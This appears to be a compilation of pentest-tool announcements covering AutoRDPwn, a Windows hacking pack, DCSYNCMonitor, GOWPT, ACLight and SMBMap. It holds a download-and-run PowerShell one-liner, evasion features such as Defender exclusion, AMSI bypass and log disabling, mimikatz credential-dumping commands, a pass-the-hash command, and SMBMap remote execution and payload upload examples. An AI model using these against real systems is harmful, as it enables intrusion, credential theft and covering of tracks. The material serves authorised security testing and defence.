AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

PowerShell 4.0 or higher

Changes

Version 4.8
• Compatibility with PowerShell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PsExec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New available module: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
* The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

PowerShell 5.0 or higher

Changes

Version 4.5
• New ninja style icon!
• Automatic cleaning of PowerShell history after execution
• Now all dependencies are downloaded from the same repository
• Many errors and bugs fixed
• UAC & AMSI bypass in 64-bit systems
• New module available: Remote Desktop Caching
• New module available: Disable system logs (Invoke-Phant0m)
• New module available: Sticky Keys Hacking
• New available module: Remote Desktop History
• New available attack: Session Hijacking (passwordless)
WARNING! This attack is very intrusive and can only be used locally
* The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.

One line execution:

powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link: https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack
===========

Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (e.g. Sysinternals).

"pes" means "PE Scrambled". It's useful sometimes.

Remote Exploits
===========

Windows 2000 / XP SP1
MS05-039 Microsoft Plug and Play Service Overflow, works with SSDP too
http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp

Windows XP/NT (before SP2)
MS03-026 Microsoft RPC DCOM Interface Overflow (kaht2.zip)
http://www.securityfocus.com/bid/8205/exploit

Windows XP (SP2 and SP3) (can be used also for priv esc)
MS08-067 Remote Stack Overflow Vulnerability Exploit (srvsvc)
https://www.exploit-db.com/exploits/7104/

Windows 7 and Server 2008 R2 (x64), all Service Packs
MS17-010 aka "Eternal Blue"
https://github.com/RiskSense-Ops/MS17-010

Windows Server 2016 (DoS, may lead to exec)
"Fuzzing SMB" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8

Privilege Escalation
===========

First, if you have meterpreter, it may be a good idea to try "getsystem".

srvcheck3.exe
=====
Privilege escalation for Windows XP SP2 and before. This can exploit vulnerable services.
http://seclists.org/fulldisclosure/2006/Feb/231
Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"

KiTrap0D.tar
=====
Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7
MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/

Other ways of exploits listed
=====

Windows XP/2003
MS11-080 -> Local Privilege Escalation Exploit Afd.sys
https://www.exploit-db.com/exploits/18176/

Windows Vista/7
CVE-2010-4398 Elevation of Privileges (UAC Bypass)
http://www.securityfocus.com/bid/45045/exploit

Windows 8.1 (and before)
MS14-058 -> TrackPopupMenu Privilege Escalation
https://www.exploit-db.com/exploits/37064/

Windows 8.1 (and before)
MS15-051 Win32k LPE vulnerability used in APT attack "taihou32"
https://www.exploit-db.com/exploits/37049/

Windows 10 (and before)
Hot Potato (NBNS spoof + WPAD + SMB NTLM)
http://foxglovesecurity.com/2016/01/16/hot-potato/

Windows 10 (and before)
Link/URL based exploitation of NetNTLM hashes, e.g. sending a link file in email or dropping it on a file share.
Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM

Windows XP SP2 (and before)
srvcheck3.exe - upnp service or SSDPSRV service

Windows NT/2K/XP/2K3/Vista/2K8/7/8
KiTrap0D - EPATHOBJ Local Ring Exploit
https://www.exploit-db.com/exploits/11199/

Windows XP (and after)
.lnk exploit for receiving NetNTLM hashes remotely.
https://www.youtube.com/watch?v=cuF_Ibo-mmM

Backup files if contain SAM
=====
Windows/system32/config/SAM
/WINDOWS/repair/SAM
regedit.exe HKEY_LOCAL_MACHINE -> SAM

Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel. Otherwise just copy.

Dump SAM through shadow volume
=====
If it can be created, the database could be copied from this.
Vista command: vssadmin create shadow
Server 2008 command: diskshadow

Windows Credentials Editor
=====
WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html
WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions).

Mimikatz dumping
=====
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials
=====
fgdump.exe (contains pwdump and cachedump, can read from memory)

SAM dump (hive)
=====
"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."

Dump SAM, then spray hashes
=====
keimpx (try hashes with different users, against domain accounts)
http://code.google.com/p/keimpx/

LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP
=====
LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel
https://github.com/CoreSecurity/impacket
http://packetstormsecurity.org/files/view/10457/lsadump2.zip
http://www.nirsoft.net/utils/lsa_secrets_dump.html
http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip

PassTheHash (before Windows 8.1)
=====
pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd

PassTheTicket (Kerberos)
=====
mimikatz can do it

Duplicate Access Tokens (if admin access token can be used, it's win)
=====
http://sourceforge.net/projects/incognito/

Token "Kidnapping"
=====
MS09-012, Churrasco.bin shell.bin (runs shell.bin with NT SYSTEM authority)
http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html

Other notable tools
=====
psexec, smbshell, metasploit's psexec, etc.
https://github.com/BloodHoundAD/BloodHound - It allows visualizing connections in an AD domain and finding fast escalation ways.

To Be Added
===========
- http://www.nirsoft.net/ -> Stuff for dumping passwords
- openvpn
- evilgrade

Hashes (SHA256) and VirusTotal scans
===========

Link: http://feedproxy.google.com/~r/PentestTools/~3/H6Wy8XMjNEc/whp-microsoft-windows-hacking-pack.html

DCSYNCMonitor – Monitors For DCSYNC And DCSHADOW Attacks And Create Custom Windows Events For These Events

This tool is an application/service that can be deployed on Domain Controllers to alert on Domain Controller Synchronization attempts. When an attempt is detected, the tool will write an event to the Windows Event Log. These events can be correlated in a SIEM. In addition, this tool can take a list of valid DC IPs and, in this configuration, only alert when a DC SYNC attempt comes from a non-DC IP. This tool is meant to provide Blue Teams with a way to combat DC SYNC and DC SHADOW attacks without commercial tools like Microsoft ATA or fancy IDS/IPS.

Installation Instructions

To install this tool, you can use either the pre-built binaries or build the tool yourself. Links for the prebuilt binaries:

32bit Service: https://github.com/shellster/DCSYNCMonitor/raw/master/Release/DCSYNCMONITORSERVICE.exe
64bit Service: https://github.com/shellster/DCSYNCMonitor/raw/master/x64/Release/DCSYNCMONITORSERVICE.exe

You will need either WinPcap or Npcap installed on your domain controller. WinPcap should work, but is not recommended, as its packet capture methods are not as efficient or thorough as Npcap's. This tool has only been briefly tested with WinPcap.

To install Npcap, download the installer from here: https://nmap.org/npcap/

You should make sure that the following options are checked:
- Automatically start the Npcap driver at boot time
- Restrict Npcap driver's access to Administrators only

After installing, you will need to reboot the domain controller.

Npcap does not install the supporting library DLLs into the system's DLL search path, so you will need to perform the following tasks after installing:

copy "%WINDIR%\System32\Npcap\*.dll" "%WINDIR%\System32\"
#If Applicable (32bit Service on 64bit System):
copy "%WINDIR%\SYSWOW64\Npcap\*.dll" "%WINDIR%\SYSWOW64\"

Note: If the previous step is not completed, you will receive errors about a missing wpcap.dll or Packet.dll when attempting to run the tool.

Now copy the DCSYNCMONITOR.EXE from this project into an appropriate location. We recommend %WINDIR%\SYSTEM32 for either 32bit systems or 64bit systems with a 64bit service, or %WINDIR%\SYSWOW64 if you are using the 32bit service on a 64bit system.

The tool can now be run, in one of two ways:

Without a configuration file

In this mode, the tool will write a DCSYNCALERT Warning event to the Windows Application Event Log every time a new IP (not seen in the previous five minutes) attempts to perform a DC SYNC against the domain controller. This will include legitimate synchronization activities between domain controllers.

With a configuration file

A configuration file called "dc_ip_list.conf" can be placed in the same directory as the tool. If this file exists, it should contain one IPv4 (or long form IPv6) address per line. The tool will ingest this list on start-up. In this mode, no events will be written for DC Sync attempts from matching IP addresses. However, if a DC Sync attempt occurs from any other IP address, a DCSYNCALERT Error event will be written to the Windows Application Event Log.

Note: Changes to the dc_ip_list.conf file will not take effect until the service is stopped and restarted.

The usual way to use this tool is to install it as a service. Once the tool is placed in the correct folder, this can easily be accomplished by running:

DCMONITORSERVICE.exe -install

Once you have installed the service, you will need to start it manually from the Services.msc menu or by using the appropriate net or sc commands. It will auto-start on future reboots.

Should you need to uninstall the service, run the following command:

DCMONITORSERVICE.exe -remove

Finally, to run the tool in stand-alone mode, without installing a service (especially useful for debugging):

DCMONITORSERVICE.exe -standalone

Screenshots

DC SYNC Warning events occur when there is no list of valid DC IPs provided, or when a DC SYNC occurs from a valid DC IP.
DC SYNC Error events occur when a list of valid DC IPs is provided and a DC SYNC occurs from any other IP address.

Compilation Instructions

You will need Visual Studio 2015 or later. The Community (free) edition is perfectly acceptable. Once you open the project, you should be able to immediately build Dev and Release versions in both 32bit and 64bit varieties. The Debug editions should not be deployed in a production environment: they print extensive error and debugging information, including TCP packet dumps if you uncomment the following lines in the monitor.cpp file:

#ifdef _DEBUG
    //debug_print("TCP SRC IP: %s\nData:\n", tcppacket.source_ip.address.c_str());
    //print_payload((const u_char *)tcppacket.data, tcppacket.data_length);
#endif
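The two alerting modes described above, modelled as an added example (this is not the project's own C++ code): the no-config mode raises one Warning per source per five-minute window, the config-file mode stays silent for listed DC addresses and raises an Error for any other source. The dc_ip_list.conf text and the event stream are constructed, and the assumption that any attempt, alerted or not, counts as "seen" is the example's, not the page's.

```python
"""Model of the DCSYNCMonitor alerting rules (added example, not the
project's own code).  Sample events and config text are constructed."""
from datetime import datetime, timedelta
from ipaddress import ip_address

# "every time a new IP (not seen in the previous five minutes)"
DEDUP_WINDOW = timedelta(minutes=5)


def load_dc_ip_list(text):
    """Parse dc_ip_list.conf content: one IPv4 or IPv6 address per line.

    Blank lines are skipped.  A line that is not an address raises, so a
    typo in the list is noticed at start-up instead of silently turning a
    real DC into a source of Error events (assumption: the real tool's
    handling of malformed lines is not documented on the page).
    """
    dc_ips = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        try:
            dc_ips.add(ip_address(line))
        except ValueError as exc:
            raise ValueError(f"dc_ip_list.conf line {lineno}: {exc}") from None
    return dc_ips


class DcSyncMonitor:
    """Decide which Application-log event (if any) one DCSYNC attempt gets."""

    def __init__(self, dc_ips=None):
        self.dc_ips = dc_ips    # None -> running without a configuration file
        self.last_seen = {}     # source address -> time of its last attempt

    def observe(self, when, src):
        """Return "Warning", "Error" or None for an attempt from src at when."""
        src = ip_address(src)
        if self.dc_ips is not None:
            # Config-file mode: listed DCs are silent, everything else is an Error.
            return None if src in self.dc_ips else "Error"
        # No-config mode: one Warning per source per five-minute window.
        # Assumption: any attempt (alerted or not) counts as "seen".
        previous = self.last_seen.get(src)
        self.last_seen[src] = when
        if previous is not None and when - previous < DEDUP_WINDOW:
            return None
        return "Warning"


def replay(events, dc_ips=None):
    """Run (timestamp, source ip) pairs through a fresh monitor and return
    the events that would be written as (timestamp, source ip, level)."""
    monitor = DcSyncMonitor(dc_ips)
    written = []
    for when, src in events:
        level = monitor.observe(when, src)
        if level is not None:
            written.append((when, src, level))
    return written


# Constructed sample: two real DCs replicating, then an unknown workstation.
T0 = datetime(2018, 3, 1, 9, 0, 0)
SAMPLE_EVENTS = [
    (T0, "10.0.0.5"),
    (T0 + timedelta(minutes=1), "10.0.0.5"),      # seen 1 min ago: suppressed
    (T0 + timedelta(minutes=2), "10.0.0.6"),
    (T0 + timedelta(minutes=7), "10.0.0.5"),      # 6 min since last: new Warning
    (T0 + timedelta(minutes=8), "192.168.1.77"),  # not a DC
]
SAMPLE_CONF = "10.0.0.5\n10.0.0.6\n\n"

if __name__ == "__main__":
    for mode, conf in (("no config", None), ("dc_ip_list.conf", SAMPLE_CONF)):
        dc_ips = load_dc_ip_list(conf) if conf else None
        print(f"--- {mode} ---")
        for when, src, level in replay(SAMPLE_EVENTS, dc_ips):
            print(f"{when:%H:%M} DCSYNCALERT {level:7} from {src}")
```

Without the config file every replicating DC produces a Warning, which is why the allow-list mode is the one to deploy once the DC addresses are known.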

Link: http://feedproxy.google.com/~r/PentestTools/~3/xuhR3Vsfbng/dcsyncmonitor-monitors-for-dcsync-and.html

GOWPT – Go Web Application Penetration Test

GOWPT is the younger brother of wfuzz, a swiss army knife of WAPT; it allows pentesters to perform huge activity with no stress at all: just configure it and it's just a matter of clicks.

How to install

To install gowpt just type:

make
sudo make install

Usage

From the -h menu:

Usage of gowpt:
  -H value
        A list of additional headers
  -a string
        Basic authentication (user:password)
  -c string
        A list of cookies
  -d string
        POST data for request
  -e string
        A list of comma separated encoders (default "plain")
  -f string
        Filter the results
  -from-proxy
        Get the request via a proxy server
  -fuzz
        Use the built-in fuzzer
  -p string
        Use upstream proxy
  -ssl
        Use SSL
  -t string
        Template for request
  -threads int
        Number of threads (default 10)
  -u string
        URL to fuzz
  -w string
        Wordlist file
  -x string
        Extension file example.js

Examples

Scan http://www.example.com and filter all 200 OK requests
gowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200"

Scan http://www.example.com fuzzing vuln GET parameter looking for XSS (assume it had 200 tags with a legit request)
gowpt -u "http://www.example.com/?vuln=FUZZ" -w wordlist/Injections/XSS.txt -f "tags > 200"

Scan http://www.example.com fuzzing vuln POST parameter looking for XSS (assume it had 200 tags with a legit request)
gowpt -u "http://www.example.com/" -d "vuln=FUZZ" -w wordlist/Injections/XSS.txt -f "tags > 200"

Scan auth protected http://www.example.com and filter all 200 OK requests
gowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200" -a "user:password"

Scan http://www.example.com adding header Hello: world and filter all 200 OK requests
gowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -f "code == 200" -H "Hello: world"

Scan http://www.example.com using basic auth with user/pass guest:guest
gowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -a "guest:guest"

Scan http://www.example.com adding an extension
gowpt -u "http://www.example.com/FUZZ" -w wordlist/general/common.txt -x myextension.js

Scan http://www.example.com (received from proxy) and filter all 200 OK requests
gowpt --from-proxy -w wordlist/general/common.txt
Then open BurpSuite, send the request you want to fuzz to Repeater and set an upstream proxy to 127.0.0.1:31337; when you're ready, click Send. If everything was right you should see as response "Request received by GOWPT".

Extension

Extensions are an easy way to extend gowpt features; a JavaScript VM is responsible for loading and executing extension files.

JS API

Below is a list of the currently implemented API:

addCustomEncoder (2 params) - Create a custom encoder to be used with wordlists. Param1 -> EncoderName (string), Param2 -> EncoderLogic (function)
panic (1 param) - For debugging purposes, crash the application. Param1 -> PanicText (string)
dumpResponse (2 params) - Dump a full request/response to disk, useful to save a testcase. Param1 -> ResponseObject (http.Response), Param2 -> Path (string)
setHTTPInterceptor (1 param) - Create an interceptor for outgoing HTTP requests and incoming responses. Param1 -> HTTPCallback (function) *
sendRequestSync (4 params) - Send an HTTP request in a synchronous way. Param1 -> Method (string), Param2 -> Url (string), Param3 -> PostData (string), Param4 -> Headers (Object{Name:Value}) *

* PS: When using setHTTPInterceptor the callback method receives 3 parameters:
- A request/response object
- A result object
- A flag object that indicates whether the first object is a request or a response

Since, by its nature, sendRequestSync will slow down the engine due to the synchronous request, use it moderately.

More info in the example extension below:

example.js

/*
 * Create a custom encoder called helloworld
 *
 * This encoder just adds the string "_helloworld" to every payload
 * coming from the wordlist
 */
addCustomEncoder("helloworld", myenc);

/*
 * Define the callback method for the helloworld encoder
 */
function myenc(data) {
    return data + "_helloworld";
}

/*
 * Create an HTTP interceptor
 *
 * The interceptor will hook every request / response.
 * It is possible to modify a request before sending it; the response item,
 * however, is just a shadow copy of the one received from the server, so no
 * modifications are possible.
 *
 * request_response is an object which may contain either an http.Request
 * or an http.Response; to know which one is contained, check the is_request flag.
 *
 * REMEMBER! request_response is an http.* object, so you must interact with
 * it just like you would do in golang!
 *
 * dumpResponse is a built-in function which dumps the full request-response to
 * disk.
 *
 * result is an object filled with stats about the response; it contains these fields:
 *
 * result.tags => Number of tags in the response
 * result.code => HTTP Response status
 * result.words => Number of words in the response
 * result.lines => Number of lines in the response
 * result.chars => Number of chars in the response
 * result.request => Full dump of the request
 * result.response => Full dump of the response
 * result.response => The injected payload
 */
setHTTPInterceptor(function(request_response, result, is_request) {
    if (is_request) {
        request_response.Header.Set("Hello", "world")
    } else {
        dumpResponse(request_response, "/tmp/dump.txt")
        /*
         * Send an HTTP request in a synchronous way
         *
         * This API accepts 4 parameters:
         * method => GET | POST | HEAD | PUT | PATCH | UPDATE
         * url => The url of the HTTP service
         * post_data => The content of the request body
         * headers => A javascript dictionary {headerName => headerValue}
         *
         * The response object may be null or undefined or an http.Response from golang
         */
        var response = sendRequestSync("GET", "http://example.com/", null, {"Fake": "Header"})
    }
})

Wordlists

Wordlists come from the wfuzz project, so thanks much guys!

Encoders

Below the list of encoders available:
url (URL encode)
urlurl (Double URL encode)
html (HTML encode)
htmlhex (HTML hex encode)
unicode (Unicode encode)
hex (Hex encode)
md5hash (MD5 hash)
sha1hash (SHA1 hash)
sha2hash (SHA2 hash)
b64 (Base64 encode)
b32 (Base32 encode)
plain (No encoding)

Filters

You can apply filters on the following variables:
tags (Number of tags)
lines (Number of lines of response body)
words (Number of words of response body)
length (Size of response body)
code (HTTP status code)
chars (Number of chars of response body)

Link: http://feedproxy.google.com/~r/PentestTools/~3/P9MGUJOV5OU/gowpt-go-web-application-penetration.html

ACLight – PowerShell Script for Advanced Discovery of Privileged Accounts (includes Shadow Admins)

ACLight is a tool for discovering privileged accounts through advanced ACLs (Access Lists) analysis. It includes the discovery of Shadow Admins in the scanned network.

The tool queries the Active Directory (AD) for its objects' ACLs and then filters and analyzes the sensitive permissions of each one. The result is a list of domain privileged accounts in the network (from the advanced ACLs perspective of the AD). You can run the scan with just any regular user (it could be a non-privileged user) and it automatically scans all the domains of the scanned network forest.

Just run it and check the result.

You should take care of all the privileged accounts that the tool discovers for you. Especially take care of the Shadow Admins: those are accounts with direct sensitive ACL assignments (not through membership in other known privileged groups).

Usage:

Option 1:
Double click on "Execute-ACLight.bat".

Option 2:
Open PowerShell (with -ExecutionPolicy Bypass)
Go to the "ACLight" main folder
Import-Module '.\ACLight.psm1'
Start-ACLsAnalysis

Reading the results files:

First check the "Accounts with extra permissions.txt" file. It's a straightforward and important list of the privileged accounts that were discovered in the scanned network.

"All entities with extra permissions.txt" - The file lists all the privileged entities that were discovered; it will include not only the user accounts but also other "empty" entities like empty groups or old accounts.

"Privileged Accounts Permissions – Final Report.csv" - This is the final summary report; in this file you will find the exact sensitive permissions each account has.

"Privileged Accounts Permissions – Irregular Accounts.csv" - Similar to the final report, with only the privileged accounts that have direct assignment of ACL permissions (not through their group membership).

"[Domain name] – Full Output.csv" - Raw ACLs output for each scanned domain.

Scalability - scanning very large networks or networks with multiple trusted domains:

The tool by default will automatically scan all the domains in the target scanned AD forest.
If you want to scan a specific domain and not the others, you can just close those domains' pop-up windows when they show up and continue regularly.
If you are scanning a very large network (e.g. 50,000+ users in one domain) and encounter memory limitations during the scan, there are some tips you can check in the "issues" page.

References:

The tool uses functions from the open source project PowerView by Will Schroeder (@harmj0y), a great project.

For more comments and questions, you can contact Asaf Hecht (@Hechtov) and CyberArk Labs.

Link: http://feedproxy.google.com/~r/PentestTools/~3/gha2JJZVHWU/aclight-powershell-script-for-advanced.html

SMBMap – Samba Share Enumeration Tool

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind, and is intended to simplify searching for potentially sensitive data across large networks.

You'll need Impacket to use this tool: https://github.com/CoreSecurity/impacket
Apparently the latest Impacket requires PyASN.1: http://sourceforge.net/projects/pyasn1/

Features:
- Pass-the-Hash Support
- File upload/download/delete
- Permission enumeration (writable share, meet Metasploit)
- Remote Command Execution
- Distributed file content searching (new!)
- File name matching (with an auto download capability)

Help

SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com

optional arguments:
  -h, --help            show this help message and exit

Main arguments:
  -H HOST               IP of host
  --host-file FILE      File containing a list of hosts
  -u USERNAME           Username, if omitted null session assumed
  -p PASSWORD           Password or NTLM hash
  -s SHARE              Specify a share (default C$), ex 'C$'
  -d DOMAIN             Domain name (default WORKGROUP)
  -P PORT               SMB port (default 445)

Command Execution:
  Options for executing commands on the specified host
  -x COMMAND            Execute a command ex. 'ipconfig /r'

Filesystem Search:
  Options for searching/enumerating the filesystem of the specified host
  -L                    List all drives on the specified host
  -R [PATH]             Recursively list dirs, and files (no share\path lists ALL shares), ex. 'C$\Finance'
  -r [PATH]             List contents of directory, default is to list root of all shares, ex. -r 'C$\Documents and Settings\Administrator\Documents'
  -A PATTERN            Define a file name pattern (regex) that auto downloads a file on a match (requires -R or -r), not case sensitive, ex '(web|global).(asax|config)'
  -q                    Disable verbose output (basically only really useful with -A)

File Content Search:
  Options for searching the content of files
  -F PATTERN            File content search, -F '[Pp]assword' (requires admin access to execute commands, and powershell on victim host)
  --search-path PATH    Specify drive/path to search (used with -F, default C:\Users), ex 'D:\HR\'

Filesystem interaction:
  Options for interacting with the specified host's filesystem
  --download PATH       Download a file from the remote system, ex. 'C$\temp\passwords.txt'
  --upload SRC DST      Upload a file to the remote system ex. '/tmp/payload.exe C$\temp\payload.exe'
  --delete PATH TO FILE Delete a remote file, ex. 'C$\temp\msf.exe'
  --skip                Skip delete file confirmation prompt

Examples:

$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

Default Output:

$ python smbmap.py --host-file smb-hosts.txt -u jsmith -p 'R33nisP!nckl3' -d ABC
[+] Reading from stdin
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.0.5:445    Name: unkown
    Disk                    Permissions
    ----                    -----------
    ADMIN$                  READ, WRITE
    C$                      READ, WRITE
    IPC$                    NO ACCESS
    TMPSHARE                READ, WRITE
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445    Name: unkown
    Disk                    Permissions
    ----                    -----------
    IPC$                    NO ACCESS
    print$                  READ, WRITE
    My Dirs                 NO ACCESS
    WWWROOT_OLD             NO ACCESS
    ADMIN$                  READ, WRITE
    C$                      READ, WRITE

Command execution:

$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.2.50:445    Name: unkown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

Non recursive path listing (ls):

$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'
[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 172.16.0.24:445    Name: 172.16.0.24
    Disk                    Permissions
    ----                    -----------
    C$                      READ, WRITE
    .Users
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
    fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
    dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus

File Content Searching:

$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.168.0.99...
[+] User SMB session establishd on 192.168.0.85...
[+] User SMB session establishd on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully 
deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt[+] All jobs completeHost: 192.168.0.85 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]No matching patterns foundHost: 192.168.0.89 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htmC:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htmHost: 192.168.0.99 Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]C:\Users\biffh\AppData\Local\Microsoft\Internet Explorer\DOMStore\L7W17OPZ\static.olark[1].xmlC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MIY2POGJ\validation[2].jsC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Docs[1].htmC:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Salesmaps[1].htmDrive Listing:This feature was added to compliment the file content searching feature$ python smbmap.py -H 192.168.1.24 -u Administrator -p ‘R33nisP!nckle’ -L [!] 
